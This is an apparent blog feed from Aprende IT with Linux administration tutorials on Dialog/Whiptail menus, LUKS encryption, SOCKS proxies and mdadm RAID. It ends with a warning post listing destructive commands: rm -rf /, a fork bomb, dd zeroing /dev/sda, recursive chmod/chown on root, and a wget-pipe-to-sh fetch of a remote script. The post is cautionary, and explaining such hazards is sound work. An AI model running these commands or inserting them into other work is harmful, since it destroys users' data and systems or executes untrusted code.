Systems archivos » Aprende IT All the latest news about IT Fri, 23 Aug 2024 12:13:35 +0000 en-US hourly 1 https://aprendeit.com/wp-content/uploads/2020/02/LOGO-CORTO-100x100.png Systems archivos » Aprende IT 32 32 Creating Interactive Scripts in Linux: Using Dialog or Whiptail https://aprendeit.com/en/creating-interactive-scripts-in-linux-using-dialog-or-whiptail/ https://aprendeit.com/en/creating-interactive-scripts-in-linux-using-dialog-or-whiptail/#respond Fri, 23 Aug 2024 12:13:35 +0000 https://aprendeit.com/?p=6483 In the world of system administration, it is common to encounter the need to automate tasks through shell scripts. However, sometimes we need to make these scripts interactive to facilitate ...

La entrada Creating Interactive Scripts in Linux: Using Dialog or Whiptail se publicó primero en Aprende IT.

]]>
In the world of system administration, it is common to encounter the need to automate tasks through shell scripts. However, sometimes we need to make these scripts interactive to facilitate the user experience, especially in environments where a full graphical interface is not available. This is where tools like Dialog and Whiptail come into play.

Both Dialog and Whiptail are tools that allow creating simple and functional graphical interfaces within a text terminal. These tools are very useful for developing menus, dialog boxes, selection lists, progress bars, and much more. Throughout this article, we will guide you through the basic concepts and practical examples of both tools so that you can use them in your own scripts.

What is Dialog?

Dialog is a command-line tool used to generate interactive dialog boxes in text-based terminals. It is widely used in shell scripts to create interactive menus, confirmation boxes, forms, progress bars, among others. Dialog allows users to interact with a script through a text-based user interface, which is especially useful in server environments where a full graphical interface is not available.

Installing Dialog

To install Dialog on a Debian or Ubuntu-based distribution, simply run the following command:

sudo apt-get update
sudo apt-get install dialog

For Red Hat-based distributions like CentOS or Fedora:

sudo yum install dialog

Basic Examples of Dialog

Simple Message Box

This example shows a simple message box with only an “OK” button:

#!/bin/bash
dialog --title "Message" --msgbox "Hello, this is a simple message box." 6 50

Explanation: In this script, –title defines the dialog box title, –msgbox is the type of dialog used, and “6 50” are the dimensions of the box (6 lines high and 50 characters wide).

Interactive Menu

The following example creates a menu where the user can select an option:

#!/bin/bash
option=$(dialog --title "Main Menu" --menu "Select an option:" 15 50 4
1 "Option 1"
2 "Option 2"
3 "Option 3"
4 "Exit" 3>&1 1>&2 2>&3)
clear

echo "You selected option: $option"

Explanation: The menu is displayed with numbered options. 3>&1 1>&2 2>&3 is used to redirect the user’s selection back to the standard output.

Selection List

In this example, the user can select one or more items from a list:

#!/bin/bash
options=$(dialog --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5
1 "Apache" off
2 "MySQL" off
3 "PHP" off
4 "Python" off
5 "Java" off 3>&1 1>&2 2>&3)
clear

echo "Selected packages: $options"

Explanation: –checklist creates a list of items with checkboxes, where off indicates that the checkbox is unchecked by default.

Progress Bar

Progress bars are useful for showing the progress of a task. Here’s an example:

#!/bin/bash
{
for ((i = 0 ; i <= 100 ; i+=10)); do
sleep 1
echo $i
done
} | dialog --title "Progress" --gauge "Installing..." 10 70 0

Explanation: –gauge is used to create a progress bar. The for loop simulates the progress of a task, increasing the bar by 10% every second.

What is Whiptail?

Whiptail is a lightweight alternative to Dialog that also allows creating text-based interactive interfaces in shell scripts. Although Whiptail offers a similar set of features, it is especially useful in systems where Dialog is not available or where a lighter tool is preferred.

Installing Whiptail

To install Whiptail on Debian, Ubuntu, and their derivatives:

sudo apt-get update
sudo apt-get install whiptail

In distributions like CentOS, Red Hat, and Fedora:

sudo yum install newt

Basic Examples of Whiptail

Simple Message Box

As with Dialog, you can create a simple message box:

#!/bin/bash
whiptail --title "Message" --msgbox "This is a simple message using Whiptail." 8 45

Explanation: This example is similar to Dialog, but using Whiptail. The dimensions of the box are slightly different.

Interactive Menu

Creating interactive menus is easy with Whiptail:

#!/bin/bash
option=$(whiptail --title "Main Menu" --menu "Choose an option:" 15 50 4 \
"1" "Option 1" \
"2" "Option 2" \
"3" "Option 3" \
"4" "Exit" 3>&1 1>&2 2>&3)
clear

echo "You selected option: $option"

Explanation: This script works similarly to the Dialog example, allowing the user to select an option from a menu.

Selection List

Whiptail also allows creating selection lists with checkboxes:

#!/bin/bash
options=$(whiptail --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5 \
"Apache" "" ON \
"MySQL" "" OFF \
"PHP" "" OFF \
"Python" "" OFF \
"Java" "" OFF 3>&1 1>&2 2>&3)
clear

echo "Selected packages: $options"

Explanation: In this example, “ON” indicates that the checkbox is checked by default, unlike Dialog’s “off”.

Progress Bar

Finally, here’s an example of a progress bar with Whiptail:

#!/bin/bash
{
    for ((i = 0 ; i <= 100 ; i+=10)); do
        sleep 1
        echo $i
    done
} | whiptail --gauge "Installing..." 6 50 0

Explanation: This example is very similar to Dialog, but using Whiptail’s syntax.
Both Dialog and Whiptail are powerful and flexible tools that allow system administrators and developers to create interactive user interfaces within a terminal. Although both tools are similar in functionality, the choice between one or the other may depend on the specific needs of the system and personal preferences.

Dialog is more popular and widely documented, while Whiptail is a lighter alternative that may be preferred in systems where minimizing resource usage is crucial.

In this article, we have covered the basics of Dialog and Whiptail with practical examples that will allow you to start creating your own interactive scripts. Whether you need a simple menu, a message box, or a progress bar, these tools will provide the necessary functionalities to improve user interaction with your scripts.

Remember that the key to mastering these tools is practice. Try the examples provided, modify them to suit your needs, and continue exploring the many possibilities that Dialog and Whiptail offer to make your scripts more intuitive and user-friendly.

Video

Video Script

Below are two example scripts of two interactive menus:
Dialog

#!/bin/bash

# Example of a menu using Dialog
dialog --menu "Select an option:" 15 50 4 \
1 "View system information" \
2 "Show disk usage" \
3 "Configure network" \
4 "Exit" 2>selection.txt

# Read the selected option
option=$(cat selection.txt)

case $option in
    1)
        echo "Showing system information..."
        # Corresponding commands would go here
        ;;
    2)
        echo "Showing disk usage..."
        # Corresponding commands would go here
        ;;
    3)
        echo "Configuring network..."
        # Corresponding commands would go here
        ;;
    4)
        echo "Exiting..."
        exit 0
        ;;
    *)
        echo "Invalid option."
        ;;
esac

The result would be:

dialog
Whiptail

#!/bin/bash

# Example of a menu using Whiptail
option=$(whiptail --title "Main Menu" --menu "Select an option:" 15 50 4 \
"1" "View system information" \
"2" "Show disk usage" \
"3" "Configure network" \
"4" "Exit" 3>&1 1>&2 2>&3)

# Verify the selected option
case $option in
    1)
        echo "Showing system information..."
        # Corresponding commands would go here
        ;;
    2)
        echo "Showing disk usage..."
        # Corresponding commands would go here
        ;;
    3)
        echo "Configuring network..."
        # Corresponding commands would go here
        ;;
    4)
        echo "Exiting..."
        exit 0
        ;;
    *)
        echo "Invalid option."
        ;;
esac

With Whiptail, the result would be this:

whiptail
As you can see, the results are very similar.

References and Documentation

For Dialog and Whiptail, you can find extensive documentation at https://invisible-island.net/dialog/dialog.html

La entrada Creating Interactive Scripts in Linux: Using Dialog or Whiptail se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/creating-interactive-scripts-in-linux-using-dialog-or-whiptail/feed/ 0
Partition and Disk Encryption with LUKS on Linux https://aprendeit.com/en/partition-and-disk-encryption-with-luks-on-linux/ https://aprendeit.com/en/partition-and-disk-encryption-with-luks-on-linux/#respond Sun, 12 May 2024 19:28:46 +0000 https://aprendeit.com/?p=6240 Welcome to the fascinating world of partition and disk encryption on Linux using LUKS (Linux Unified Key Setup). In this chapter, we will explore in detail how to use LUKS ...

La entrada Partition and Disk Encryption with LUKS on Linux se publicó primero en Aprende IT.

]]>
Welcome to the fascinating world of partition and disk encryption on Linux using LUKS (Linux Unified Key Setup). In this chapter, we will explore in detail how to use LUKS to protect your sensitive data by encrypting your disks and partitions. From installing necessary tools to handling specialized commands, I will guide you step by step through this crucial process for your data security.

Installing Necessary Tools

Before diving into the world of encryption with LUKS, it is essential to ensure you have the appropriate tools installed on your system. Generally, most Linux distributions include these encryption tools by default, but it’s always good to verify.

You can install the necessary tools using your distribution’s package manager. In Debian-based distributions, like Ubuntu, you can run the following command in the terminal:

sudo apt install cryptsetup

If you are using a Red Hat-based distribution, like Fedora or CentOS, you can install the encryption tools with the following command:

sudo dnf install cryptsetup

Once you have installed cryptsetup, you will be ready to start working with LUKS.

Creating a LUKS Volume

The first step to encrypt a partition or disk on Linux is to create a LUKS volume. This volume will act as an encryption layer that protects the data stored on the partition or disk.

To create a LUKS volume, you will need to specify the partition or disk you want to encrypt. Make sure the partition is unmounted before proceeding. Suppose we want to encrypt the partition /dev/sdb1. The following command will create a LUKS volume on this partition:

sudo cryptsetup luksFormat /dev/sdb1

This command will initiate the process of creating the LUKS volume on the specified partition. You will be prompted to confirm this action, as the process will erase all existing data on the partition. After confirming, you will be asked to enter a password to unlock the LUKS volume in the future. Make sure to choose a secure password and remember it well, as you will need it every time you want to access the encrypted data.

Once the process is complete, you will have a LUKS volume created on the specified partition, ready to be used.

Opening and Closing the LUKS Volume

After creating a LUKS volume, the next step is to open it to access the data stored on it. To open a LUKS volume, you will need to specify the partition containing the volume and assign it a name.

sudo cryptsetup luksOpen /dev/sdb1 my_encrypted_partition

In this command, /dev/sdb1 is the partition containing the LUKS volume, and my_encrypted_partition is the name we are assigning to the opened volume. Once you run this command, you will be asked to enter the password you specified during the creation of the LUKS volume. After entering the correct password, the volume will open and be ready to be used.

To close the LUKS volume and block access to the encrypted data, you can use the following command:

sudo cryptsetup luksClose my_encrypted_partition

This command will close the LUKS volume with the specified name (my_encrypted_partition in this case), preventing access to the data stored on it until it is opened again.

Creating a File System on a LUKS Volume

Once you have opened a LUKS volume, you can create a file system on it to start storing data securely. You can use any Linux-compatible file system, such as xfs or btrfs.

Suppose we want to create an xfs file system on the opened LUKS volume (my_encrypted_partition). The following command will create an xfs file system on the volume:

sudo mkfs.xfs /dev/mapper/my_encrypted_partition

This command will format the opened LUKS volume with an xfs file system, allowing you to start storing data on it securely.

Mounting and Unmounting a LUKS Volume

Once you have created a file system on a LUKS volume, you can mount it to the file system to access the data stored on it. To mount a LUKS volume, you can use the following command:

sudo mount /dev/mapper/my_encrypted_partition /mnt

In this command, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS volume, and /mnt is the mount point where the file system will be mounted.

After mounting the LUKS volume, you can access the data stored on it as you would with any other file system mounted on Linux. When you have finished working with the data, you can unmount the LUKS volume using the following command:

sudo umount /mnt

This command will unmount the file system of the LUKS volume, preventing access to the data stored on it until it is mounted again.

Managing LUKS Volumes

LUKS provides several tools for managing volumes, including the ability to change the password, add additional keys, and backup the headers of the volumes.

To change the password of a LUKS volume, you can use the following command:

sudo cryptsetup luksChangeKey /dev/sdb1

This command will prompt you for the current password of the LUKS volume and then allow you to enter a new password.

If you want to add an additional key to the LUKS volume, you can use the following command:

sudo cryptsetup luksAddKey /dev/sdb1

This command will prompt you for the current password of the LUKS volume and then allow you to enter a new additional key.

To backup the header of a LUKS volume, you can use the following command:

sudo cryptsetup luksHeaderBackup /dev/sdb1 --header-backup-file backup_file

This command will backup the header of the LUKS volume to the specified file, allowing you to restore it in case the volume header is damaged.

Summary of Commands to Create Encrypted Volume with LUKS

sudo cryptsetup luksFormat /dev/DISK
sudo cryptsetup luksOpen /dev/DISK DECRYPTED_DISK
sudo mkfs.xfs /dev/mapper/DECRYPTED_DISK
sudo mount /dev/mapper/DECRYPTED_DISK /mount_point

Integration with crypttab and fstab

Once you have encrypted a partition or disk using LUKS on Linux, you may want to configure the automatic opening of the LUKS container during system boot and mount it at a specific point in the file system. This can be achieved using the crypttab and fstab configuration files.

crypttab Configuration

The crypttab file is used to configure the automatic mapping of encrypted devices during the system boot process. You can specify the encrypted devices and their corresponding encryption keys in this file.

To configure an encrypted device in crypttab, you first need to know the UUID (Universally Unique Identifier) of the LUKS container. You can find the UUID by running the following command:

sudo cryptsetup luksUUID /dev/sdb1

Once you have the UUID of the LUKS container, you can add an entry in the crypttab file to configure the automatic mapping. For example, suppose the UUID of the LUKS container is 12345678-1234-1234-1234-123456789abc. You can add the following entry to the crypttab file:

my_encrypted_partition UUID=12345678-1234-1234-1234-123456789abc none luks

It can also be done this way without using the UUID:

my_encrypted_partition /dev/sdb1 none luks

In this entry, my_encrypted_partition is the name we have given to the LUKS container, and UUID=12345678-1234-1234-1234-123456789abc is the UUID of the container. The word none indicates that no pre-shared key is used, and luks specifies that the device is encrypted with LUKS.

fstab Configuration

Once you have configured the automatic mapping of the encrypted device in crypttab, you can configure the automatic mounting of the file system in fstab. The fstab file is used to configure the automatic mounting of file systems during system boot.

To configure the automatic mounting of a file system in fstab, you first need to know the mount point and the file system type of the LUKS container. Suppose the mount point is /mnt/my_partition and the file system is xfs. You can add an entry in the fstab file as follows:

/dev/mapper/my_encrypted_partition /mnt/my_partition xfs defaults 0 2

In this entry, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS container, /mnt/my_partition is the mount point where the file system will be mounted, xfs is the file system type, defaults specifies the default mount options, and 0 2 specifies the file system check options.

Recommendations with crypttab

In the case of a server, I would not have crypttab active, meaning I would leave the configuration set but commented out, as well as with fstab. I would perform the mounts manually after a reboot. This avoids having to use key files and prevents some derived issues.

La entrada Partition and Disk Encryption with LUKS on Linux se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/partition-and-disk-encryption-with-luks-on-linux/feed/ 0
Create SOCKS Proxy with Dante and OpenSSH https://aprendeit.com/en/create-socks-proxy-with-dante-and-openssh/ https://aprendeit.com/en/create-socks-proxy-with-dante-and-openssh/#respond Mon, 25 Mar 2024 22:31:35 +0000 https://aprendeit.com/?p=6152 How to Create a SOCKS Proxy with Dante on Ubuntu In the digital era, maintaining online privacy and security is more crucial than ever. One way to protect your identity ...

La entrada Create SOCKS Proxy with Dante and OpenSSH se publicó primero en Aprende IT.

]]>
How to Create a SOCKS Proxy with Dante on Ubuntu

In the digital era, maintaining online privacy and security is more crucial than ever. One way to protect your identity and data on the internet is through the use of a SOCKS proxy server. This type of proxy acts as an intermediary between your device and the internet, hiding your real IP address and encrypting your internet traffic. In this article, we will guide you step by step on how to set up your own SOCKS proxy server on Ubuntu using Dante, a versatile and high-performance proxy server.

Starting Dante Installation

Before diving into the Dante setup, it’s essential to prepare your system and ensure it is updated. To do this, open a terminal and run the following commands:

sudo apt update
sudo apt install dante-server

These commands will update your system’s package list and then install Dante, respectively.

Configuring the danted.conf File

Once Dante is installed, the next step is to configure the proxy server. This is done by editing the danted.conf configuration file located in /etc/danted/. To do this, use your preferred text editor. Here, we will use vim:

vim /etc/danted.conf

Inside this file, you must specify crucial details such as the external and internal interfaces, the authentication method, and access rules. Below, we show you an example configuration that you can adjust according to your needs:

logoutput: syslog
user.privileged: root
user.unprivileged: nobody

# The external interface (can be your public IP address or the interface name)
external: eth0

# The internal interface (usually your server's IP address or loopback)
internal: 0.0.0.0 port=1080

# Authentication method
socksmethod: username

# Access rules
client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    log: connect disconnect error
}

# Who can use this proxy
socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    command: bind connect udpassociate
    log: connect disconnect error
    socksmethod: username
}

This configuration defines a SOCKS server that listens on all available interfaces (0.0.0.0) on port 1080. It uses username authentication and allows connections from and to any address.

Creating a User for the Proxy

For the proxy to be secure and not open to the public, it’s necessary to create a specific user for the connection. This is achieved with the following commands:

sudo useradd -r -s /bin/false username
sudo passwd username

Here, username is the username you wish for the proxy connection. The useradd command creates the user, and passwd allows you to assign a password.

Restarting and Enabling Dante Service

With the user created and the configuration file adjusted, it’s time to restart the Dante service and ensure it runs at system startup:

sudo systemctl restart danted.service
sudo systemctl enable danted.service
sudo systemctl status danted.service

Furthermore, it’s important to ensure that port 1080, where the proxy listens, is allowed in the firewall:

sudo ufw allow 1080/tcp

Verifying the Connection

Finally, to verify everything is working correctly, you can test the connection through the proxy with the following command:

curl -v -x socks5://username:password@your_server_ip:1080 https://whatismyip.com/

Remember to replace username, password, and your_server_ip with your specific information. This command will use your proxy server to access a website that shows your public IP address, thus verifying that traffic is indeed being redirected through the SOCKS proxy.

Setting up a SOCKS proxy server with Dante may seem complex at first, but by following these steps, you can have a powerful system

You can configure a SOCKS5 proxy server using OpenSSH on Ubuntu 22.04, which is a simpler and more direct alternative in certain cases, especially for personal use or in situations where you already have an SSH server set up. Below, I explain how to do it:

Creating a Socks 5 Proxy with OpenSSH

Unlike Dante, with which we can create a proxy service with authentication, with OpenSSH, we can create a tunnel on a port that can be used as a SOCKS proxy without authentication, so it is convenient to use it only for localhost within a single computer (we will explain this better later)

Installing OpenSSH Server

If you don’t already have OpenSSH Server installed on your server that will act as the proxy, you can install it with the following command as long as it’s a Debian / Ubuntu-based distribution:

sudo apt update
sudo apt install openssh-server

Ensure the service is active and running correctly with:

sudo systemctl status ssh

Configuring the SSH Server (Optional)

By default, OpenSSH listens on port 22. You can adjust additional configurations by editing the /etc/ssh/sshd_config file, such as changing the port, restricting access to certain users, etc. If you make changes, remember to restart the SSH service:

sudo systemctl restart ssh

Using SSH as a SOCKS5 Proxy

To configure an SSH tunnel that works as a SOCKS5 proxy, use the following command from your client (not on the server). This command establishes an SSH tunnel that listens locally on your machine on the specified port (for example, 1080) and redirects traffic through the SSH server:

ssh -D 1080 -C -q -N user@server_address
  • -D 1080 specifies that SSH should create a SOCKS5 proxy on local port 1080.
  • -C compresses data before sending.
  • -q enables silent mode that minimizes log messages.
  • -N indicates no remote commands should be executed, useful when you only want to establish the tunnel.
  • user is your username on the SSH server.
  • server_address is the IP address or domain of your SSH server.

At this point, we mention that with the -D option, you should only specify the port as exposing the port to the entire network may allow other devices on the network to use this proxy without authenticating:

[ger@ger-pc ~]$ ssh -D 0.0.0.0:1081 root@192.168.54.100

If we check with the command ss or netstat, we can see that it is listening on all networks:

[ger@ger-pc ~]$ ss -putan|grep 1081
tcp LISTEN 0 128 0.0.0.0:1081 0.0.0.0:* users:(("ssh",pid=292405,fd=4)) 
[ger@ger-pc ~]$

However, if we connect by specifying only the port without 0.0.0.0 or without any IP, it will only do so on localhost:

[ger@ger-pc ~]$ ssh -D 1081 root@192.168.54.100

.......

[ger@ger-pc ~]$ ss -putan|grep 1081
tcp LISTEN 0 128 127.0.0.1:1081 0.0.0.0:* users:(("ssh",pid=292485,fd=5)) 
tcp LISTEN 0 128 [::1]:1081 [::]:* users:(("ssh",pid=292485,fd=4)) 
[ger@ger-pc ~]$

Connecting Through the SOCKS5 Proxy:

Now you can configure your browser or application to use the SOCKS5 proxy on localhost and port 1080. Each application has a different way of configuring this, so you will need to review the preferences or documentation of the application.

Automating the Connection (Optional):
If you need the tunnel to be established automatically at startup or without manual interaction, you may consider using a tool like autossh to keep the tunnel connection open and reconnect in case it drops.

This is an effective way to establish a quick SOCKS5 proxy for a user or a few users, especially useful for bypassing network restrictions or securing your traffic on untrusted networks. The main advantage of this method is its simplicity and that it leverages existing SSH infrastructure without the need to configure additional software on the server.

La entrada Create SOCKS Proxy with Dante and OpenSSH se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/create-socks-proxy-with-dante-and-openssh/feed/ 0
How to create a software RAID on linux with mdadm https://aprendeit.com/en/how-to-create-a-software-raid-on-linux-with-mdadm/ https://aprendeit.com/en/how-to-create-a-software-raid-on-linux-with-mdadm/#respond Fri, 15 Mar 2024 17:26:22 +0000 https://aprendeit.com/?p=2534 Today we wanted to extend this article on how to create a software RAID on linux with mdadm. We start with the theory. What is a RAID? We can define ...

La entrada How to create a software RAID on linux with mdadm se publicó primero en Aprende IT.

]]>
Today we wanted to extend this article on how to create a software RAID on linux with mdadm. We start with the theory.

What is a RAID?

We can define a disk raid as a group or array of independent disks, in fact RAID is an acronym for Redundant Array of Independent Disks. The disks are unified by software or hardware to redundant data and/or use the full capacity of each disk as a whole. This will be easier to understand when we define each type of RAID later.

Difference between hardware RAID and software RAID

  • What is Software RAID?

Software RAID is, as the name says, an application that allows the creation of RAIDs at a logical level from disks connected to our computer. This software creates a file system in which it works behaving according to the type of RAID configured.

  • What is Hardware RAID?A hardware raid is a physical device that allows the creation of a RAID of disks.  It can be a PCI or PCIE expansion card or it can be integrated in the motherboard, this hardware integrates everything necessary to perform a RAID without using the processor or the system’s RAM (as a general rule), it can also integrate a cache. This cache can speed up read/write operations.

What are their main differences and the advantages of each one?

  • Hardware RAID requires hardware which carries a cost.
  • With hardware RAID, in case of disk failure, we only need to insert the new disk and the RAID is usually rebuilt without any additional steps (as a general rule).
  • Software RAID avoids the point of failure of a single RAID card. If this card fails the RAID will not work.
  • In today’s systems the difference in performance compared to hardware RAID is less noticeable as processors are more powerful.
  • Hardware RAID does not use resources of the host machine’s processor.

Most used RAID levels

· RAID 0 (Data Striping, Striped Volume)

This raid takes the capacity of the added disks and adds them together. For example if we have 2 disks of 1TB with this RAID we will get a volume of 2TB. If the disks are of different capacities, it always takes the lowest one to use, as well as the RPM (revolutions per minute) of the disk. That is to say, if we have a 2TB disk at 7200RPM and another of 1TB at 5400RPM we will have a volume of 2TB at 5400RPM, that is to say, we return to have a volume of 2TB but slower. That is why it is important that the disks are similar.

On the other hand, in this type of RAIDs performance is a priority but not security, there is no data redundancy so if a disk breaks the volume will be corrupted.

raid-0

· RAID 1 (mirror)

This RAID as in the previous RAID and in all the RAID, the disks must have the same capacity to avoid wasting disks. In this RAID mode the two disks are configured in mirror, this means that the entire contents of the disk is replicated on another disk for every 2 disks 1 disk is dedicated to redundant data. It is recommended for 2 disks. This RAID has an added advantage and they are greater speed of reading multiuser since data of the two disks can be read. However writes are slower as they have to be done on both disks.

raid-1

· RAID 5

This RAID is the most popular due to its low cost. With 3 disks approximately 75% of the disk capacity is available. It requires only a minimum of 3 disks and supports the complete loss of one disk. The information is served in blocks distributed by the total of the disks so the more disks the more performance also influences the size of the disks the bigger they are the more time it takes to rebuild the RAID in case of failure of a disk. This RAID protects against failures by distributing the parity calculation over all the disks and thus protecting against possible hardware errors.

The weakness of this type of RAID is that if a disk fails, until it is replaced the volume is unprotected against failure of another disk. This is where Spare disks come in. A spare disk is a reserve disk that enters “to be part of the game” when one of the disks fails, this way the number of disks that can fail is two (as long as the RAID is not in reconstruction process when the second disk fails) This way we avoid the failure point mentioned before. When the spare disk is added, this type of RAID is also known as RAID 5E. There are two types of spare: “standby spare” and “hot spare”.

If it is a standby spare it involves a rebuilding process during the addition of the spare disk replacing the failed disk, however if it is a hot spare this time is minimized.

raids-RAID-5

· RAID 6

Let’s say it is the evolution of RAID 5, it needs at least 4 disks. It works like RAID 5 but with double parity stripe which is also spread over all disks. This type of RAID supports the total failure of up to two disks even during the RAID rebuild. It is less used because when few disks are used the capacity of two disks is wasted because they do not reach the theoretical maximum, with 4 disks the RAID will have about half the capacity of the disks. The more disks used in the RAID, the more capacity of each disk is used.

As in RAID 5, in RAID 6 spare disks can be added (usually called RAID 6E) to support a third failed disk (the latter can fail without corrupting the volume as long as the raid is not being rebuilt).

raids-RAID-6

Nested RAID levels

Nested RAID levels is “RAID on RAID”. That is a RAID of one type mounted on RAID(s) of another type. This way you can take advantage of the benefits of each RAID. For example:

  • RAID 0+1 : It is a mirror of RAIDs 0, that is to say if we have 4 disks, 2 raids 0 are created with each pair of disks and with the 2 RAID volumes created a raid 1 is created. In this way we add redundancy to RAID 0.
  • RAID 1+0: It is a RAID 0 of two mirrors (RAID 1). Two RAID 1 are created with each pair of disks and with the pair of RAID 1 created, a RAID 0 is created.
  • RAID 50 (5+0): For this RAID a minimum of 6 disks are required. With each trio of disks a RAID 5 is created. Then with each RAID created a RAID 0 is created with the RAID 5 created. With 6 disks a total of approximately 65% of the disk capacity is reached.

The most common RAID types are:

  • RAID 0: For storage of non-critical data of which loss is not important.
  • RAID 1: For operating systems, e.g. on servers. The operating system is usually installed on a RAID 1.
  • RAID 5: Storage in general because of its low cost and good reliability.

How to mount in linux each type of RAID with “mdadm”:

A raid in linux is very easy to configure using the steps we are going to describe:

Step 1: Install mdadm: by default it is not usually installed on Linux.

In debian and derivatives:

apt-get install mdadm

On RedHat / CentOS and derivatives:

yum install mdadm

install-mdadm

Step2: The disks to be included in the RAID must be filled with zeros to avoid problems with existing file systems:

root@localhost:~# mdadm --zero-superblock /dev/hdb /dev/hdc

(And so many other disks to use) or with DD:

dd

Step 3: The next thing would be to create the RAID, basically it would be with:

mdadm -C /dev/NOMBRERAID --level=raid[NUMERO] --raid-devices=NUMERO_DE_DISCOS /dev/DISCO1 /dev/DISCO2
  • RAID 0: A minimum of two disks are selected (e.g. vdc and vdd):
mdadm -C /dev/md0 --level=raid0 --raid-devices=2 /dev/vdc /dev/vdd

 

RAID-0-terminal

Como crear un RAID por software en linux con mdadm

  • RAID 1: In the case of RAID 1 it is best to select a maximum of 2 disks / volumes (we use vdc and vdd as examples):

 

mdadm -C /dev/md0 --level=raid1 --raid-devices=2 /dev/vdc /dev/vdd

 

raid1

  • RAID 5: At least three disks:

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=3 /dev/vdb /dev/vdc /dev/vdd

 

raid5

If we want a spare disk (we have to add all the disks including the spare to the RAID from the beginning):

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=3 --spare-devices=1 /dev/vdb /dev/vdc /dev/vdd /dev/vde

 

 

  • RAID 6: At least 4 disks

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=4 /dev/vdb /dev/vdc /dev/vdd /dev/vde

 

And with spare parts:

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=4 --spare-devices=1 /dev/vdb /dev/vdc /dev/vdd /dev/vde /dev/vdf

 

 

In case of failure of a disk of a RAID we only must extract it and insert the new disk and when we introduce the new disk (looking at the system log of /var/log/messages) we execute:

 

mdadm --add /dev/RAID /dev/NUEVO_DISCO

 

In case you want to stop a RAID:

 

mdadm --stop /dev/md0 && mdadm --remove /dev/md0
Y para consultar el estado:

cat /proc/mdstat

And this has been all about how to create a software RAID in linux with mdadm.

If you liked the article leave a comment and/or share on your social networks.

See you soon!

La entrada How to create a software RAID on linux with mdadm se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/how-to-create-a-software-raid-on-linux-with-mdadm/feed/ 0
Commands you should not run in Linux https://aprendeit.com/en/commands-you-should-not-run-in-linux/ https://aprendeit.com/en/commands-you-should-not-run-in-linux/#respond Sun, 25 Feb 2024 20:23:55 +0000 https://aprendeit.com/?p=6077 In the vast world of Linux, the terminal is a powerful tool that grants users unprecedented control over their systems. However, with great power comes great responsibility. There are certain ...

La entrada Commands you should not run in Linux se publicó primero en Aprende IT.

]]>
In the vast world of Linux, the terminal is a powerful tool that grants users unprecedented control over their systems. However, with great power comes great responsibility. There are certain commands that, while they may seem harmless or curious at first glance, can cause irreparable damage to your system. In this article, we will explore ten of these lethal commands, explaining in detail why you should keep them away from your terminal.

The Devastating rm -rf /

We start with the infamous rm -rf / command, a statement that seems simple but hides destructive potential. This command deletes all system files, starting from the root (/). The -r modifier indicates that deletion should be recursive, that is, affect all files and directories contained in the specified directory, while -f forces deletion without asking for confirmation. Running this command as a superuser means saying goodbye to your operating system, your data, and any hope of easy recovery.

In short, be careful with executing recursive rm commands as we can delete more than we want:

  • rm -fr *
  • rm -fr */
  • rm -fr /*
  • rm -fr .
  • rm -fr ..

The Trap of :(){ :|: & };:

This enigmatic command is an example of a fork bomb function. It defines a function called : that, when executed, calls itself twice, and each call is executed in the background. This causes a chain reaction, doubling processes indefinitely and consuming system resources until it hangs. It’s a denial of service attack against your own machine, pushing processing and memory capacity to the limit.

To better understand, :(){ :|: & };: is the same as running:

bomb() {
    bomb | bomb &;
}; bomb

The Danger of dd if=/dev/zero of=/dev/sda

The dd command is a powerful tool used to convert and copy files at the block level. In this context, if=/dev/zero sets the input to a continuous stream of zeros, and of=/dev/sda designates the target device, usually the main hard drive. This command overwrites the entire disk with zeros, irreversibly erasing the operating system, programs, and user data. It is essential to understand the function of each part of the command before executing something as powerful as dd.

Downloading and Executing a Malicious File

For example, the command wget http://example.com/malicious.sh -O- | sh

This command uses wget to download a script from an Internet address and executes it directly in the shell with sh. The danger lies in executing code without reviewing it, coming from an unreliable source. It could be a malicious script designed to damage your system or compromise your security. It is always vital to verify the content of scripts before executing them.

Dangerous Modification of Permissions and Properties

Modifying permissions with, for example, chmod 777 / -R can render your system unusable.
chmod changes the permissions of files and directories, and 777 grants full permissions (read, write, and execute) to all users. Applying this recursively (-R) to the root (/) removes any form of access control, exposing the system to serious security risks. Any user could modify any file, with potentially disastrous consequences.

The chown nobody:nogroup / -R Command

Similar to the previous case, chown changes the owner and group of files and directories. Using nobody:nogroup assigns ownership to a user and group without privileges, applied recursively from the root, can leave the system in an inoperable state, as critical services and processes might lose access to the files necessary for their operation.

The Mysterious mv /home/your_user/* /dev/null

Moving files to the /dev/null directory is equivalent to deleting them, as /dev/null is a black hole in the system that discards everything it receives. This command, applied to the user directory, can result in the loss of all personal data, settings, and important files stored in your home.

The Dangerous find

The find command can be very dangerous, for example, if we execute the following command:

find / -name '*.jpg' -type f -delete

What happens is that find is a versatile tool for searching for files in the file system that meet certain criteria. This command searches for all .jpg files in the system and deletes them. Although it might seem useful for freeing up space, indiscriminately deleting files based only on their extension can result in the loss of important documents, memories, and resources.

 

Causing a Kernel Panic

The following command is capable of causing a kernel panic:

echo 1 > /proc/sys/kernel/panic;

Causing a Kernel Panic error in Linux is comparable to the dreaded blue screen of death in Windows, debunking the belief that Linux is infallible. Through certain commands, like redirecting random data to critical system devices or directly manipulating memory, Linux can be forced into a kernel panic state, making the system unrecoverable without a reboot. These commands are highly risky and can result in data loss or system corruption.

Overwriting the System Disk with the Output of a Command

Overwriting the hard drive in Linux, using commands that redirect the output of any Bash command directly to a disk device (/dev/hda), can result in total data loss. This process is irreversible and differs from formatting, as it involves writing raw data over the entire unit, making it unusable. It’s a highly dangerous action with no practical benefit in most contexts.

An example of this would be:

command1 > /dev/sda1

Protect Your System, Protect Your Peace of Mind

